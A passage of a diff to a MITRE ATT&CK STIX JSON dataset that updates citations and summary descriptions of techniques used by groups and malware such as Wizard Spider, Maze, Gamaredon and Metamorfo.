Ryuk\u2019s Return. Retrieved October 9, 2020.", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/" + }, + { + "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020", + "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.", + "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/" + }, + { + "source_name": "Red Canary Hospital Thwarted Ryuk October 2020", + "description": "Brian Donohue, Katie Nickels, Paul Michaud, Adina Bodkins, Taylor Chapman, Tony Lambert, Jeff Felling, Kyle Rainey, Mike Haag, Matt Graeber, Aaron Didier.. (2020, October 29). A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak. Retrieved October 30, 2020.", + "url": "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ " } ], - "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used AdFind.exe to collect information about Active Directory groups and accounts.(Citation: FireEye Ryuk and Trickbot January 2019)", - "relationship_type": "uses", "id": "relationship--7af53b3b-0e82-4839-b69a-e47a5001218c", + "target_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", "type": "relationship", - "modified": "2020-05-18T12:37:03.945Z", - "created": "2020-05-18T12:37:03.945Z" + "created": "2020-05-18T12:37:03.945Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used AdFind.exe to collect information about Active Directory groups and accounts.(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T17:28:19.959Z" }, { "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -188673,13 +194062,18 @@ "source_name": "McAfee Maze March 2020", "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/", "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020." + }, + { + "source_name": "Sophos Maze VM September 2020", + "url": "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/", + "description": "Brandt, A., Mackenzie, P.. (2020, September 17). Maze Attackers Adopt Ragnar Locker Virtual Machine Technique. Retrieved October 9, 2020." } ], - "description": "[MAZE](https://attack.mitre.org/software/S0449) has injected the malware DLL into a target process.(Citation: McAfee Maze March 2020)\t", + "description": "[Maze](https://attack.mitre.org/software/S0449) has injected the malware DLL into a target process.(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)\t", "relationship_type": "uses", "id": "relationship--44fab50d-4fb6-4a8a-ab7a-84dcb70443f5", "type": "relationship", - "modified": "2020-06-24T01:40:07.393Z", + "modified": "2020-10-09T16:24:40.022Z", "created": "2020-05-18T17:31:39.355Z" }, { @@ -188696,7 +194090,7 @@ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020." } ], - "description": "[MAZE](https://attack.mitre.org/software/S0449) has forged POST strings with a random choice from a list of possibilities including \"forum\", \"php\", \"view\", etc. while making connection with the C2, hindering detection efforts.(Citation: McAfee Maze March 2020)", + "description": "[Maze](https://attack.mitre.org/software/S0449) has forged POST strings with a random choice from a list of possibilities including \"forum\", \"php\", \"view\", etc. while making connection with the C2, hindering detection efforts.(Citation: McAfee Maze March 2020)", "relationship_type": "uses", "id": "relationship--6a521aa4-d389-4ef4-bd24-442d8af23333", "type": "relationship", @@ -188717,7 +194111,7 @@ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020." } ], - "description": "[MAZE](https://attack.mitre.org/software/S0449) has communicated to hard-coded IP addresses via HTTP.(Citation: McAfee Maze March 2020)", + "description": "[Maze](https://attack.mitre.org/software/S0449) has communicated to hard-coded IP addresses via HTTP.(Citation: McAfee Maze March 2020)", "relationship_type": "uses", "id": "relationship--9c89cfe5-1a9f-4b2d-82e2-f1638cb13b58", "type": "relationship", @@ -188738,7 +194132,7 @@ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020." } ], - "description": "[MAZE](https://attack.mitre.org/software/S0449) has used the \"WNetOpenEnumW\", \"WNetEnumResourceW\u201d, \u201cWNetCloseEnum\u201d and \u201cWNetAddConnection2W\u201d functions to enumerate the network resources on the infected machine.(Citation: McAfee Maze March 2020)", + "description": "[Maze](https://attack.mitre.org/software/S0449) has used the \"WNetOpenEnumW\", \"WNetEnumResourceW\u201d, \u201cWNetCloseEnum\u201d and \u201cWNetAddConnection2W\u201d functions to enumerate the network resources on the infected machine.(Citation: McAfee Maze March 2020)", "relationship_type": "uses", "id": "relationship--2f3d9b76-bec9-4cee-9a9b-1c42f373ec86", "type": "relationship", @@ -188759,7 +194153,7 @@ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020." } ], - "description": "[MAZE](https://attack.mitre.org/software/S0449) has used the \u201cWow64RevertWow64FsRedirection\u201d function following attempts to delete the shadow volumes, in order to leave the system in the same state as it was prior to redirection.(Citation: McAfee Maze March 2020)\t", + "description": "[Maze](https://attack.mitre.org/software/S0449) has used the \u201cWow64RevertWow64FsRedirection\u201d function following attempts to delete the shadow volumes, in order to leave the system in the same state as it was prior to redirection.(Citation: McAfee Maze March 2020)\t", "relationship_type": "uses", "id": "relationship--cabbe975-9936-4a9a-8fae-a747b3dc7a9d", "type": "relationship", @@ -188778,13 +194172,18 @@ "source_name": "McAfee Maze March 2020", "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/", "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020." + }, + { + "source_name": "Sophos Maze VM September 2020", + "url": "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/", + "description": "Brandt, A., Mackenzie, P.. (2020, September 17). Maze Attackers Adopt Ragnar Locker Virtual Machine Technique. Retrieved October 9, 2020." } ], - "description": "[MAZE](https://attack.mitre.org/software/S0449) has disabled dynamic analysis and other security tools including IDA debugger, x32dbg, and OllyDbg.(Citation: McAfee Maze March 2020)", + "description": "[Maze](https://attack.mitre.org/software/S0449) has disabled dynamic analysis and other security tools including IDA debugger, x32dbg, and OllyDbg.(Citation: McAfee Maze March 2020) It has also disabled Windows Defender's Real-Time Monitoring feature and attempted to disable endpoint protection services.(Citation: Sophos Maze VM September 2020)", "relationship_type": "uses", "id": "relationship--dc9d4208-5e09-437e-bdd1-0dbfc4b54355", "type": "relationship", - "modified": "2020-06-24T01:40:07.443Z", + "modified": "2020-10-09T16:24:40.124Z", "created": "2020-05-18T17:31:39.464Z" }, { @@ -188799,13 +194198,18 @@ "source_name": "FireEye Maze May 2020", "url": "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", "description": "Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020." + }, + { + "source_name": "Sophos Maze VM September 2020", + "url": "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/", + "description": "Brandt, A., Mackenzie, P.. (2020, September 17). Maze Attackers Adopt Ragnar Locker Virtual Machine Technique. Retrieved October 9, 2020." } ], - "description": "The [MAZE](https://attack.mitre.org/software/S0449) encryption process has used batch scripts with various commands.(Citation: FireEye Maze May 2020)", + "description": "The [Maze](https://attack.mitre.org/software/S0449) encryption process has used batch scripts with various commands.(Citation: FireEye Maze May 2020)(Citation: Sophos Maze VM September 2020)", "relationship_type": "uses", "id": "relationship--a747c7d5-afe9-4120-bb18-f21b5d9bb988", "type": "relationship", - "modified": "2020-06-24T01:39:05.802Z", + "modified": "2020-10-09T16:24:40.189Z", "created": "2020-05-18T17:31:39.469Z" }, { @@ -188820,13 +194224,18 @@ "source_name": "McAfee Maze March 2020", "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/", "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020." + }, + { + "source_name": "Sophos Maze VM September 2020", + "url": "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/", + "description": "Brandt, A., Mackenzie, P.. (2020, September 17). Maze Attackers Adopt Ragnar Locker Virtual Machine Technique. Retrieved October 9, 2020." } ], - "description": "[MAZE](https://attack.mitre.org/software/S0449) has attempted to delete the shadow volumes of infected machines, once before and once after the encryption process.(Citation: McAfee Maze March 2020)", + "description": "[Maze](https://attack.mitre.org/software/S0449) has attempted to delete the shadow volumes of infected machines, once before and once after the encryption process.(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)", "relationship_type": "uses", "id": "relationship--ea32ebd2-9827-43ec-a3d3-f0148fee8ed8", "type": "relationship", - "modified": "2020-06-24T01:40:07.449Z", + "modified": "2020-10-19T13:55:56.528Z", "created": "2020-05-18T17:31:39.474Z" }, { @@ -188843,7 +194252,7 @@ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020." } ], - "description": "[MAZE](https://attack.mitre.org/software/S0449) has used several Windows API functions throughout the encryption process including IsDebuggerPresent, TerminateProcess, Process32FirstW, among others.(Citation: McAfee Maze March 2020)\t", + "description": "[Maze](https://attack.mitre.org/software/S0449) has used several Windows API functions throughout the encryption process including IsDebuggerPresent, TerminateProcess, Process32FirstW, among others.(Citation: McAfee Maze March 2020)\t", "relationship_type": "uses", "id": "relationship--6e4d32b9-923f-46a9-887e-4d4d0687fd1b", "type": "relationship", @@ -188862,13 +194271,18 @@ "source_name": "McAfee Maze March 2020", "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/", "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020." + }, + { + "source_name": "Sophos Maze VM September 2020", + "url": "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/", + "description": "Brandt, A., Mackenzie, P.. (2020, September 17). Maze Attackers Adopt Ragnar Locker Virtual Machine Technique. Retrieved October 9, 2020." } ], - "description": "[MAZE](https://attack.mitre.org/software/S0449) has used \"wmic.exe\" attempting to delete the shadow volumes on the machine.(Citation: McAfee Maze March 2020)", + "description": "[Maze](https://attack.mitre.org/software/S0449) has used WMI to attempt to delete the shadow volumes on a machine, and to connect a virtual machine to the network domain of the victim organization's network.(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020) ", "relationship_type": "uses", "id": "relationship--b8ead9c4-0403-4b23-b33f-8ac1c57f8e82", "type": "relationship", - "modified": "2020-06-24T01:40:07.456Z", + "modified": "2020-10-19T13:52:25.533Z", "created": "2020-05-18T17:31:39.477Z" }, { @@ -188885,7 +194299,7 @@ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020." } ], - "description": "[MAZE](https://attack.mitre.org/software/S0449) has decrypted strings and other important information during the encryption process. [MAZE](https://attack.mitre.org/software/S0449) also calls certain functions dynamically to hinder analysis.(Citation: McAfee Maze March 2020)\t", + "description": "[Maze](https://attack.mitre.org/software/S0449) has decrypted strings and other important information during the encryption process. [Maze](https://attack.mitre.org/software/S0449) also calls certain functions dynamically to hinder analysis.(Citation: McAfee Maze March 2020)\t", "relationship_type": "uses", "id": "relationship--e3864ffa-3348-4791-b979-7d8b2e2151cc", "type": "relationship", @@ -188906,7 +194320,7 @@ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020." } ], - "description": "[MAZE](https://attack.mitre.org/software/S0449) has checked the language of the infected system using the \"GetUSerDefaultUILanguage\" function.(Citation: McAfee Maze March 2020)", + "description": "[Maze](https://attack.mitre.org/software/S0449) has checked the language of the infected system using the \"GetUSerDefaultUILanguage\" function.(Citation: McAfee Maze March 2020)", "relationship_type": "uses", "id": "relationship--0d3f773c-ed0e-4db4-8457-204a7a33eb58", "type": "relationship", @@ -188927,7 +194341,7 @@ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020." } ], - "description": "[MAZE](https://attack.mitre.org/software/S0449) has inserted large blocks of junk code, including some components to decrypt strings and other important information for later in the encryption process.(Citation: McAfee Maze March 2020)", + "description": "[Maze](https://attack.mitre.org/software/S0449) has inserted large blocks of junk code, including some components to decrypt strings and other important information for later in the encryption process.(Citation: McAfee Maze March 2020)", "relationship_type": "uses", "id": "relationship--0bbdc984-1515-4a8e-a211-2817371fc75e", "type": "relationship", @@ -188948,7 +194362,7 @@ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020." } ], - "description": "[MAZE](https://attack.mitre.org/software/S0449) has gathered all of the running system processes.(Citation: McAfee Maze March 2020)\t", + "description": "[Maze](https://attack.mitre.org/software/S0449) has gathered all of the running system processes.(Citation: McAfee Maze March 2020)\t", "relationship_type": "uses", "id": "relationship--c54e60c1-728d-4211-b309-89f928ae7f0a", "type": "relationship", @@ -188969,7 +194383,7 @@ "description": "Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020." } ], - "description": "[MAZE](https://attack.mitre.org/software/S0449) has disrupted systems by encrypting files on targeted machines, claiming to decrypt files if a ransom payment is made. [MAZE](https://attack.mitre.org/software/S0449) has used the ChaCha algorithm, based on Salsa20, and an RSA algorithm to encrypt files.(Citation: FireEye Maze May 2020)", + "description": "[Maze](https://attack.mitre.org/software/S0449) has disrupted systems by encrypting files on targeted machines, claiming to decrypt files if a ransom payment is made. [Maze](https://attack.mitre.org/software/S0449) has used the ChaCha algorithm, based on Salsa20, and an RSA algorithm to encrypt files.(Citation: FireEye Maze May 2020)", "relationship_type": "uses", "id": "relationship--006e029e-0714-4f99-befd-53b9fbc7c8c8", "type": "relationship", @@ -189359,27 +194773,6 @@ "modified": "2020-06-23T00:48:35.292Z", "created": "2020-05-18T21:01:51.172Z" }, - { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10", - "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", - "external_references": [ - { - "source_name": "ESET LoudMiner June 2019", - "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/", - "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020." - } - ], - "description": "[LoudMiner](https://attack.mitre.org/software/S0451) can automatically launch at startup if the AutoStart option is enabled in the VBoxVmService configuration file.(Citation: ESET LoudMiner June 2019)", - "relationship_type": "uses", - "id": "relationship--8e8a2a1c-3574-417c-95be-d62bb9d8f40a", - "type": "relationship", - "modified": "2020-06-23T00:48:35.276Z", - "created": "2020-05-18T21:01:51.180Z" - }, { "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ @@ -189612,25 +195005,25 @@ "created": "2020-05-18T21:01:51.381Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0", "external_references": [ { "source_name": "FireEye Ryuk and Trickbot January 2019", - "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", - "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020." + "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html" } ], - "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used AdFind.exe to collect information about Active Directory organizational units and trust objects.(Citation: FireEye Ryuk and Trickbot January 2019)", - "relationship_type": "uses", "id": "relationship--e2df3e8d-beeb-4592-88f0-0241e321be91", + "target_ref": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0", "type": "relationship", - "modified": "2020-05-18T21:36:26.102Z", - "created": "2020-05-18T21:36:26.102Z" + "created": "2020-05-18T21:36:26.102Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used AdFind.exe to collect information about Active Directory organizational units and trust objects.(Citation: FireEye Ryuk and Trickbot January 2019)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-05-18T21:36:26.102Z" }, { "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -189812,13 +195205,18 @@ "source_name": "TrendMicro Gamaredon April 2020", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/", "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020." + }, + { + "source_name": "ESET Gamaredon June 2020", + "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/", + "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020." } ], - "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools have registered Run keys in the registry to give malicious VBS files persistence.(Citation: TrendMicro Gamaredon April 2020)", + "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools have registered Run keys in the registry to give malicious VBS files persistence.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)", "relationship_type": "uses", "id": "relationship--f2d0fd0d-7bfc-4f3e-bd78-2d691c476046", "type": "relationship", - "modified": "2020-06-22T18:23:55.083Z", + "modified": "2020-08-31T15:06:48.619Z", "created": "2020-05-19T20:39:12.450Z" }, { @@ -189833,13 +195231,18 @@ "source_name": "TrendMicro Gamaredon April 2020", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/", "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020." + }, + { + "source_name": "ESET Gamaredon June 2020", + "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/", + "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020." } ], - "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools decrypted additional payloads from the C2.(Citation: TrendMicro Gamaredon April 2020)\t", + "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools decrypted additional payloads from the C2. [Gamaredon Group](https://attack.mitre.org/groups/G0047) has also decoded base64-encoded source code of a downloader.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)", "relationship_type": "uses", "id": "relationship--86bcc5c3-456e-4bac-a419-54f54af80325", "type": "relationship", - "modified": "2020-06-22T17:55:32.153Z", + "modified": "2020-08-31T15:06:48.443Z", "created": "2020-05-19T20:39:12.455Z" }, { @@ -190097,7 +195500,7 @@ "relationship_type": "mitigates", "id": "relationship--af69bb4e-4cdb-4a9d-afff-5508c99c1276", "type": "relationship", - "modified": "2020-05-20T13:33:50.879Z", + "modified": "2020-10-07T18:10:06.591Z", "created": "2020-05-20T13:33:50.879Z" }, { @@ -191366,11 +196769,11 @@ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020." } ], - "description": "[APT39](https://attack.mitre.org/groups/G0087) has used the post exploitation tool CrackMapExec to enumerate network shares.(Citation: BitDefender Chafer May 2020)", + "description": "[APT39](https://attack.mitre.org/groups/G0087) has used the post exploitation tool [CrackMapExec](https://attack.mitre.org/software/S0488) to enumerate network shares.(Citation: BitDefender Chafer May 2020)", "relationship_type": "uses", "id": "relationship--307e732c-c407-4466-951b-38062bb5e32b", "type": "relationship", - "modified": "2020-05-29T20:22:11.379Z", + "modified": "2020-07-17T15:58:56.012Z", "created": "2020-05-22T15:43:05.281Z" }, { @@ -192574,13 +197977,23 @@ "source_name": "Medium Metamorfo Apr 2020", "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767", "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020." + }, + { + "source_name": "Fortinet Metamorfo Feb 2020", + "url": "https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions", + "description": "Zhang, X.. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020." + }, + { + "source_name": "FireEye Metamorfo Apr 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020." } ], - "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has searched files and directories for various files and strings related to its mutexes.(Citation: Medium Metamorfo Apr 2020)", + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has searched the Program Files directories for specific folders and has searched for strings related to its mutexes.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)(Citation: FireEye Metamorfo Apr 2018) ", "relationship_type": "uses", "id": "relationship--f45f18e9-4a0c-4f22-8ef6-5a18314535ea", "type": "relationship", - "modified": "2020-06-10T21:56:15.852Z", + "modified": "2020-10-21T19:08:44.345Z", "created": "2020-05-26T18:03:17.256Z" }, { @@ -192616,13 +198029,18 @@ "source_name": "Medium Metamorfo Apr 2020", "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767", "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020." + }, + { + "source_name": "FireEye Metamorfo Apr 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020." } ], - "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has side-loaded its malicious DLL file.(Citation: Medium Metamorfo Apr 2020)", + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has side-loaded its malicious DLL file.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)", "relationship_type": "uses", "id": "relationship--44533bc7-0368-4269-b465-7e08d3a8beea", "type": "relationship", - "modified": "2020-06-10T21:56:15.901Z", + "modified": "2020-07-30T17:43:35.464Z", "created": "2020-05-26T18:03:17.295Z" }, { @@ -192658,13 +198076,23 @@ "source_name": "Medium Metamorfo Apr 2020", "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767", "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020." + }, + { + "source_name": "FireEye Metamorfo Apr 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020." + }, + { + "source_name": "Fortinet Metamorfo Feb 2020", + "url": "https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions", + "description": "Zhang, X.. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020." } ], - "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has written its executable path to the Registry Run key to achieve persistence.(Citation: Medium Metamorfo Apr 2020) ", + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has written its executable path to a Registry Run key and used .LNK files in the startup folder to achieve persistence.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020)", "relationship_type": "uses", "id": "relationship--4be5482c-2a58-41af-a7d7-477c596b4622", "type": "relationship", - "modified": "2020-06-10T21:56:15.902Z", + "modified": "2020-10-21T22:48:31.139Z", "created": "2020-05-26T18:49:10.050Z" }, { @@ -195472,11 +200900,11 @@ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020." } ], - "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has embedded a \"vmdetect.exe\" executable to execute right at the start to identify virtual machines.(Citation: Medium Metamorfo Apr 2020) ", + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has embedded a \"vmdetect.exe\" executable to identify virtual machines at the beginning of execution.(Citation: Medium Metamorfo Apr 2020) ", "relationship_type": "uses", "id": "relationship--6176ae5b-cd96-4b15-8539-5fb6e230fd5d", "type": "relationship", - "modified": "2020-06-01T15:28:39.662Z", + "modified": "2020-10-22T01:34:58.105Z", "created": "2020-06-01T15:28:39.662Z" }, { @@ -196185,11 +201613,11 @@ { "source_name": "Mandiant M-Trends 2020", "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020", - "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." + "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." } ], "type": "relationship", - "modified": "2020-06-18T11:38:27.813Z", + "modified": "2020-09-14T19:54:58.831Z", "created": "2020-06-08T17:06:00.709Z" }, { @@ -196542,11 +201970,11 @@ { "source_name": "Mandiant M-Trends 2020", "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020", - "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." + "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." } ], "type": "relationship", - "modified": "2020-06-19T14:45:59.763Z", + "modified": "2020-09-14T19:48:07.522Z", "created": "2020-06-09T15:33:13.725Z" }, { @@ -199235,35 +204663,35 @@ "created": "2020-06-15T14:22:33.878Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe", "external_references": [ { "source_name": "Forbes Dyre May 2017", - "url": "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates/#601c77842a0a", - "description": "Brewster, T. (2017, May 4). https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates/#601c77842a0a. Retrieved June 15, 2020." + "description": "Brewster, T. (2017, May 4). https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates/#601c77842a0a. Retrieved June 15, 2020.", + "url": "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates/#601c77842a0a" }, { "source_name": "CrowdStrike Wizard Spider March 2019", - "url": "https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/", - "description": "Feeley, B. and Stone-Gross, B. (2019, March 20). New Evidence Proves Ongoing WIZARD SPIDER / LUNAR SPIDER Collaboration. Retrieved June 15, 2020." + "description": "Feeley, B. and Stone-Gross, B. (2019, March 20). New Evidence Proves Ongoing WIZARD SPIDER / LUNAR SPIDER Collaboration. Retrieved June 15, 2020.", + "url": "https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/" }, { "source_name": "Malwarebytes TrickBot Sep 2019", - "url": "https://blog.malwarebytes.com/trojans/2019/09/trickbot-adds-new-trick-to-its-arsenal-tampering-with-trusted-texts/", - "description": "Umawing, J. (2019, September 3). TrickBot adds new trick to its arsenal: tampering with trusted texts. Retrieved June 15, 2020." + "description": "Umawing, J. (2019, September 3). TrickBot adds new trick to its arsenal: tampering with trusted texts. Retrieved June 15, 2020.", + "url": "https://blog.malwarebytes.com/trojans/2019/09/trickbot-adds-new-trick-to-its-arsenal-tampering-with-trusted-texts/" } ], - "description": "(Citation: Forbes Dyre May 2017)(Citation: CrowdStrike Wizard Spider March 2019)(Citation: Malwarebytes TrickBot Sep 2019)", - "relationship_type": "uses", "id": "relationship--61805115-3044-4ed7-91f4-074b2a073e02", + "target_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe", "type": "relationship", - "modified": "2020-06-16T19:04:09.745Z", - "created": "2020-06-15T19:06:44.790Z" + "created": "2020-06-15T19:06:44.790Z", + "description": "(Citation: Forbes Dyre May 2017)(Citation: CrowdStrike Wizard Spider March 2019)(Citation: Malwarebytes TrickBot Sep 2019)", + "created_by_ref": 